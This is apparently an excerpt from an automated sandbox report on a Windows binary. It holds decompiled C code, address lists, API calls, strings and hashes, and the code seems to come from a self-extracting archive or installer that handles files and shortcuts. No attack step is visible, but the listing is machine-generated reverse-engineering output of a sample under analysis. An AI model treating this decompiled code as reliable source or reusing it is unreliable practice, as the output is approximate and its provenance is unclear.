									E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E001B0BB8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E001B4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L152:
									__eflags =  *(__ebp - 0x11c8c);
									__ebx = 0x800;
									if( *(__ebp - 0x11c8c) != 0) {
										_push(0x800);
										__eax = __ebp - 0x9c8c;
										_push(__ebp - 0x9c8c);
										__eax = __ebp - 0x11c8c;
										_push(__ebp - 0x11c8c);
										__eax = E0019AED7();
									}
									_push(__ebx);
									__eax = __ebp - 0xbc8c;
									_push(__ebp - 0xbc8c);
									__eax = __ebp - 0x6c84;
									_push(__ebp - 0x6c84);
									__eax = E0019AED7();
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E001AA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E001B4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E0019B153(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L162:
										__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L163;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L163:
											_push(1);
											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00199D3A(__ecx, __ebp) = __ebp - 0xbc8c;
											__ebp - 0xac8c = E001B4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E0019B98D(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E001A9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E001A9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcc8c;
												_push(__ebp - 0xcc8c);
												_push(5);
												_push(0x1000);
												__eax =  *0x1cdef8();
											}
											goto L167;
										}
										goto L162;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0x1d9600 = 1;
								}
								goto L167;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E001B59C0( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0x1d75d4 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0x1d75d5 = 1;
									} else {
										__eax = 0;
										 *0x1d75d4 = __al;
										 *0x1d75d5 = __al;
									}
								}
								goto L167;
							case 0xd:
								 *0x1ede21 = 1;
								__eax = __eax + 0x1ede21;
								_t112 = __esi + 0x39;
								 *_t112 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t112;
								__ebp = 0xffffa37c;
								if( *_t112 != 0) {
									_t114 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t114;
									_push(_t114);
									 *0x1cd5fc = E001A13FC();
								}
								goto L167;
						}
						L4:
						_t220 = E001A9E24(_t220, _t296);
						_t296 = _t296 + 0x2000;
						_t293 = _t293 - 1;
						if(_t293 != 0) {
							goto L4;
						} else {
							_t297 = _t293;
							goto L6;
						}
						L167:
						_push(0x1000);
						_t205 = _t302 - 0xe; // 0xffffa36e
						_t206 = _t302 - 0xd; // 0xffffa36f
						_t207 = _t302 - 0x5c84; // 0xffff46f8
						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t302 + 0xc)));
						_t215 = E001AA156();
						_t278 =  *((intOrPtr*)(_t302 + 0x10));
						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
					} while (_t215 != 0);
				}
			}

0x001ab4c7
0x001ab4cc
0x001ab4d1
0x001ab4d6
0x001ab4df
0x001ac0c7
0x001ac0ca
0x001ac0d4
0x001ac0d4
0x001ab4e5
0x001ab4ed
0x001ab4f1
0x001ab4f8
0x001ab4ff
0x001ab500
0x001ab503
0x001ab50a
0x001ab50f
0x001ab516
0x001ab51b
0x001ab51d
0x001ab523
0x001ab529
0x001ab529
0x00000000
0x001ab53e
0x001ab555
0x001ab559
0x00000000
0x001ab55b
0x00000000
0x001ab55b
0x001ab559
0x001ab563
0x00000000
0x00000000
0x001ab569
0x00000000
0x001ab570
0x001ab573
0x00000000
0x00000000
0x001ab579
0x001ab586
0x001ab5ac
0x001ab5b7
0x001ab5c1
0x001ab5cc
0x001ab5d1
0x001ab5d9
0x001ab5df
0x001ab5e4
0x001ab5e6
0x001ab74b
0x001ab74b
0x001ab755
0x00000000
0x001ab5ec
0x001ab5f2
0x001ab614
0x001ab623
0x001ab630
0x001ab641
0x001ab644
0x001ab647
0x001ab65a
0x001ab661
0x001ab666
0x001ab668
0x00000000
0x00000000
0x001ab66e
0x001ab675
0x001ab67a
0x001ab67f
0x001ab68b
0x001ab690
0x001ab693
0x001ab69a
0x001ab69c
0x001ab69d
0x001ab6a7
0x001ab6ad
0x001ab6ae
0x00000000
0x001ab6ae
0x001ab650
0x001ab656
0x001ab658
0x00000000
0x00000000
0x00000000
0x001ab6b4
0x001ab6bb
0x001ab6bd
0x001ab6c0
0x001ab730
0x001ab730
0x001ab738
0x001ab73e
0x001ab743
0x001ab745
0x001ab5f4
0x001ab5f9
0x001ab601
0x001ab607
0x001ab60e
0x00000000
0x00000000
0x00000000
0x001ab60e
0x00000000
0x001ab745
0x001ab6c9
0x001ab6cf
0x001ab6d1
0x00000000
0x001ab6d3
0x001ab6d3
0x001ab6d5
0x001ab6d6
0x001ab6da
0x001ab6f2
0x001ab6f7
0x001ab701
0x001ab703
0x001ab706
0x001ab6d8
0x001ab6d8
0x001ab6d9
0x00000000
0x001ab708
0x001ab716
0x001ab71c
0x001ab71e
0x001ab72a
0x001ab72a
0x00000000
0x001ab71e
0x001ab706
0x001ab6d1
0x00000000
0x001ab75f
0x001ab761
0x001ab7b4
0x001ab7b9
0x001ab7c2
0x001ab7c3
0x001ab7c9
0x001ab7ce
0x001ab7d1
0x001ab7d3
0x001ab7d5
0x001ab7da
0x001ab7dc
0x001ab7de
0x001ab7de
0x001ab7e0
0x001ab7e0
0x001ab7e5
0x001ab7ea
0x001ab7eb
0x001ab7eb
0x001ab7ec
0x001ab7ee
0x001ab7f5
0x001ab7fa
0x001ab7ee
0x00000000
0x00000000
0x001ab800
0x001ab802
0x001ab812
0x001ab812
0x00000000
0x00000000
0x001ab81d
0x001ab81f
0x00000000
0x00000000
0x001ab825
0x001ab82c
0x00000000
0x00000000
0x001ab832
0x001ab834
0x001ab83a
0x001ab83c
0x001ab843
0x001ab844
0x001ab84b
0x001ab84d
0x001ab84d
0x001ab854
0x001ab859
0x001ab85f
0x001ab861
0x00000000
0x001ab867
0x001ab867
0x001ab86a
0x001ab86c
0x001ab86d
0x001ab870
0x001ab899
0x001ab899
0x001ab89c
0x001ab981
0x001ab98a
0x001ab98f
0x001ab98f
0x001ab991
0x001ab991
0x001ab993
0x001ab995
0x001ab99c
0x001ab9a1
0x001ab9a2
0x001ab9a3
0x001ab9a5
0x001ab9a7
0x001ab9ab
0x001ab9ad
0x001ab9ad
0x001ab9af
0x001ab9af
0x001ab9ab
0x001ab9b3
0x001ab9b9
0x001ab9c6
0x001ab9cd
0x001ab9dd
0x001ab9e7
0x001ab9ef
0x001ab9fb
0x001ab9fd
0x001aba05
0x001aba0a
0x001aba0b
0x001aba0c
0x001aba0e
0x001aba1b
0x001aba24
0x001aba24
0x00000000
0x001aba0e
0x001ab8a2
0x001ab8a5
0x001ab8b2
0x001ab8b2
0x001ab8b5
0x001ab8b7
0x001ab8b8
0x001ab8ba
0x001ab8bb
0x001ab8c0
0x001ab8c5
0x001ab8cb
0x001ab8cd
0x001ab8cf
0x001ab8d2
0x001ab8d9
0x001ab8da
0x001ab8e0
0x001ab8e1
0x001ab8e4
0x001ab8e5
0x001ab8e6
0x001ab8eb
0x001ab8ee
0x001ab8f4
0x001ab8fd
0x001ab900
0x001ab905
0x001ab907
0x001ab909
0x001ab90b
0x001ab90b
0x001ab90d
0x001ab90d
0x001ab90f
0x001ab90f
0x001ab917
0x001ab91e
0x001ab920
0x001ab927
0x001ab92d
0x001ab92f
0x001ab930
0x001ab938
0x001ab947
0x001ab947
0x001ab938
0x001ab952
0x001ab954
0x001ab963
0x001ab969
0x001ab96f
0x001ab97a
0x001ab97a
0x00000000
0x001ab96f
0x001ab8a7
0x001ab8ac
0x00000000
0x00000000
0x00000000
0x001ab8ac
0x001ab872
0x001ab876
0x00000000
0x00000000
0x001ab878
0x001ab87b
0x001ab87d
0x001ab880
0x00000000
0x001ab886
0x001ab88f
0x00000000
0x001ab88f
0x001ab880
0x00000000
0x001aba2b
0x001aba2c
0x001aba31
0x001aba33
0x001aba36
0x001aba36
0x00000000
0x001aba6c
0x001aba73
0x001aba75
0x001aba75
0x001aba77
0x001abaa6
0x001abaa6
0x001abaac
0x00000000
0x001abaac
0x001aba79
0x001aba79
0x001aba7c
0x001aba95
0x001aba9b
0x001aba9b
0x00000000
0x001aba9b
0x001aba7e
0x001aba7e
0x001aba81
0x00000000
0x00000000
0x001aba83
0x001aba83
0x001aba86
0x00000000
0x00000000
0x001aba8c
0x00000000
0x00000000
0x001abaf9
0x001abafc
0x00000000
0x00000000
0x001abafe
0x001abb0a
0x001abb0f
0x001abb10
0x001abb11
0x001abb13
0x00000000
0x00000000
0x001abb15
0x00000000
0x00000000
0x001abb5b
0x001abb5e
0x001abcdf
0x001abcdf
0x001abce2
0x001abce8
0x001abcef
0x001abcf1
0x001abcf1
0x001abcfb
0x001abcfb
0x00000000
0x001abce2
0x001abb64
0x001abb6a
0x001abb78
0x001abb84
0x001abb86
0x001abb88
0x001abb8d
0x001abb8d
0x001abba5
0x001abbb2
0x001abbb7
0x001abbb9
0x00000000
0x00000000
0x001abb8b
0x001abb8b
0x001abb8c
0x001abb8c
0x001abbc5
0x001abbcb
0x001abbd3
0x00000000
0x00000000
0x001abbd9
0x001abbe0
0x00000000
0x00000000
0x001abbe6
0x001abbe8
0x001abbef
0x001abbf5
0x001abbf7
0x001abbf8
0x001abbfd
0x001abbfe
0x001abbff
0x001abc01
0x001abc55
0x001abc55
0x001abc5d
0x001abc6b
0x001abc7c
0x001abc8a
0x001abc8a
0x001abc96
0x001abc9b
0x001abc9d
0x001abcad
0x001abcb7
0x001abcbc
0x001abcbf
0x00000000
0x001abcc5
0x001abcca
0x001abcca
0x001abccc
0x001abcd3
0x001abcd9
0x00000000
0x001abcd9
0x001abcbf
0x001abc03
0x001abc05
0x001abc07
0x001abc0e
0x00000000
0x00000000
0x001abc10
0x001abc12
0x001abc18
0x001abc18
0x001abc1c
0x00000000
0x00000000
0x001abc1e
0x001abc1f
0x001abc25
0x001abc28
0x001abc2a
0x001abc2d
0x00000000
0x00000000
0x00000000
0x001abc2f
0x001abc3c
0x001abc46
0x001abc4b
0x001abc4b
0x001abc4d
0x00000000
0x00000000
0x001abd07
0x001abd0a
0x001abd0c
0x001abd13
0x001abd15
0x001abd1b
0x001abd1c
0x001abd21
0x001abd22
0x001abd22
0x001abd27
0x001abd2a
0x001abd30
0x001abd30
0x001abd35
0x00000000
0x00000000
0x001abd41
0x001abd44
0x001abb25
0x001abb25
0x00000000
0x001abb25
0x001abd4a
0x001abb16
0x001abb16
0x001abb1c
0x001abb1d
0x001abb20
0x00000000
0x00000000
0x001abd51
0x001abd54
0x00000000
0x00000000
0x001abd5a
0x001abd5c
0x001abd63
0x001abd6b
0x001abd71
0x001abd76
0x001abd79
0x001abdae
0x001abdb3
0x001abdb9
0x001abdba
0x001abdbf
0x001abd7b
0x001abd7b
0x001abd7e
0x001abd84
0x001abd9a
0x001abd9f
0x001abda0
0x001abda5
0x001abd86
0x001abd86
0x001abd8b
0x001abd8c
0x001abd91
0x001abd91
0x001abd84
0x001abdc6
0x001abdc8
0x001abdcf
0x001abddd
0x001abde4
0x001abde9
0x001abdea
0x001abdeb
0x001abded
0x001abdee
0x001abdf5
0x001abe45
0x001abe4a
0x001abe4c
0x00000000
0x00000000
0x001abe52
0x001abe54
0x001abe5a
0x001abe61
0x00000000
0x00000000
0x001abe63
0x001abe65
0x001abe66
0x001abe66
0x001abe69
0x001abe6c
0x001abe76
0x001abe76
0x001abe78
0x001abe7a
0x001abe84
0x001abe89
0x001abe8b
0x001abec9
0x001abecc
0x001abecc
0x001abece
0x001abecf
0x001abecf
0x00000000
0x001abecf
0x001abe8d
0x001abe8f
0x001abe90
0x001abe92
0x001abe95
0x001abeaa
0x001abeac
0x001abead
0x001abead
0x001abeb0
0x001abeb0
0x001abeb5
0x001abeb6
0x001abebc
0x001abebc
0x001abebd
0x001abec2
0x001abec3
0x001abec4
0x00000000
0x001abec4
0x001abe97
0x001abe9e
0x001abea1
0x001abea2
0x00000000
0x001abea2
0x001abe6e
0x001abe70
0x001abe71
0x001abe74
0x00000000
0x00000000
0x00000000
0x001abed1
0x001abed1
0x001abed4
0x001abed4
0x001abed9
0x001abedb
0x001abedd
0x001abedd
0x001abedf
0x001abedf
0x00000000
0x001abdf7
0x001abdfe
0x001abe0a
0x001abe10
0x001abe11
0x001abe12
0x001abe17
0x001abe1a
0x001abe1c
0x001abe22
0x001abe24
0x001abe32
0x001abe37
0x001abe38
0x001abe38
0x001abee2
0x001abee2
0x001abeea
0x001abeef
0x001abef1
0x001abef2
0x001abef8
0x001abef9
0x001abeff
0x001abf00
0x001abf00
0x001abf05
0x001abf06
0x001abf0c
0x001abf0d
0x001abf13
0x001abf14
0x001abf19
0x001abf21
0x001abf2d
0x001abf2d
0x001abf3a
0x001abf3f
0x001abf47
0x001abf51
0x001abf5e
0x001abf65
0x001abf65
0x001abf71
0x001abf78
0x001abf7d
0x001abf85
0x001abf8b
0x001abf8c
0x001abf8d
0x001abf8f
0x001abf8f
0x001abfa4
0x001abfa9
0x001abfb5
0x001abfb7
0x001abfc8
0x001abfd5
0x00000000
0x001abfb9
0x001abfc4
0x001abfc6
0x001abfda
0x001abfda
0x001abfdc
0x001abfe2
0x001abfe8
0x001abff6
0x001abffb
0x001abffc
0x001ac004
0x001ac009
0x001ac010
0x001ac016
0x001ac018
0x001ac01e
0x001ac024
0x001ac026
0x001ac02f
0x001ac032
0x001ac034
0x001ac03d
0x001ac040
0x001ac046
0x001ac049
0x001ac052
0x001ac061
0x001ac066
0x001ac06e
0x001ac070
0x001ac071
0x001ac077
0x001ac078
0x001ac07a
0x001ac07f
0x001ac07f
0x00000000
0x001ac06e
0x00000000
0x001abfc6
0x001abfb7
0x00000000
0x001ac087
0x001ac08a
0x001ac08c
0x001ac08c
0x00000000
0x00000000
0x001abab8
0x001abac0
0x001abac6
0x001abac9
0x001abaed
0x001abacb
0x001abacb
0x001abace
0x001abae1
0x001abad0
0x001abad0
0x001abad2
0x001abad7
0x001abad7
0x001abace
0x00000000
0x00000000
0x001abb31
0x001abb32
0x001abb37
0x001abb37
0x001abb37
0x001abb3a
0x001abb3f
0x001abb45
0x001abb45
0x001abb4b
0x001abb51
0x001abb51
0x00000000
0x00000000
0x001ab52a
0x001ab52c
0x001ab531
0x001ab537
0x001ab53a
0x00000000
0x001ab53c
0x001ab53c
0x00000000
0x001ab53c
0x001ac093
0x001ac093
0x001ac098
0x001ac09c
0x001ac0a0
0x001ac0a7
0x001ac0ae
0x001ac0b1
0x001ac0b6
0x001ac0b9
0x001ac0bc
0x001ac0c6

APIs

__EH_prolog.LIBCMT ref: 001AB4CC

Part of subcall function 001AA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001AA21E

SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,001AADDF,?,00000000), ref: 001AB601
GetFileAttributesW.KERNEL32(?), ref: 001AB6BB
DeleteFileW.KERNEL32(?), ref: 001AB6C9
SetWindowTextW.USER32(?,?), ref: 001AB812
_wcsrchr.LIBVCRUNTIME ref: 001AB99C
GetDlgItem.USER32(?,00000066), ref: 001AB9D7
SetWindowTextW.USER32(00000000,?), ref: 001AB9E7
SendMessageW.USER32(00000000,00000143,00000000,001D9602), ref: 001AB9FB
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001ABA24

Strings

%s.%d.tmp, xrefs: 001AB6E1
Software\Microsoft\Windows\CurrentVersion, xrefs: 001AB8BB
ProgramFilesDir, xrefs: 001AB8E6
<br>, xrefs: 001AB775

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3676479488-312220925
Opcode ID: 92d22d8d9431afed2933964e60e5501d61bf3c900f4f575f1ba619b381e4fded
Instruction ID: 0f2b94d7ed00096d59848b6f194aad8773cc6b362f3c051579f15be9b842e6c6
Opcode Fuzzy Hash: 92d22d8d9431afed2933964e60e5501d61bf3c900f4f575f1ba619b381e4fded
Instruction Fuzzy Hash: 13E1827A904259AAEF24EBA4DD85EEF777CAF15350F0040A6F509E7141EF709B848FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019CFD0, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0019CFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E001AD870(E001C13DF, _t390);
				E001AD940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E001B0BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E0019FAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E0019B943(_t396, _t390 - 0x1264))) = 0;
					E0019FA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E0019943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E00199768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E0019946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0x1cd5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E001B5030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0019CC62);
						E001B5030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E0019CBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E00199B57();
							_t294 = E00199979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E00199A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E001B5460(_t390 - 0x4286 + _t384, 0x1c261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E001B4DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E001B5460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E00199A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E001B2B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E00199979(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E001B2B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E001A0FDE(_t382, _t212, _t330 + 1);
							L001B2B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E0019FA56(_t390 - 0xd4, 0x1c2624, 0x64);
							_push(0x20002);
							_t218 = E001B2B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E0019CB33(_t387, _t371, _t390, _t218, _t336);
									L001B2B4E(_t390[0x1a]);
									L001B2B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0x1d0124 =  *((intOrPtr*)(_t387 + 0x28));
										E001B5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E0019CD08);
										E001B5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E0019CD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E001A3393(_t387 + 0x3c, _t371, _t316);
										E001A3393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E0019CB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
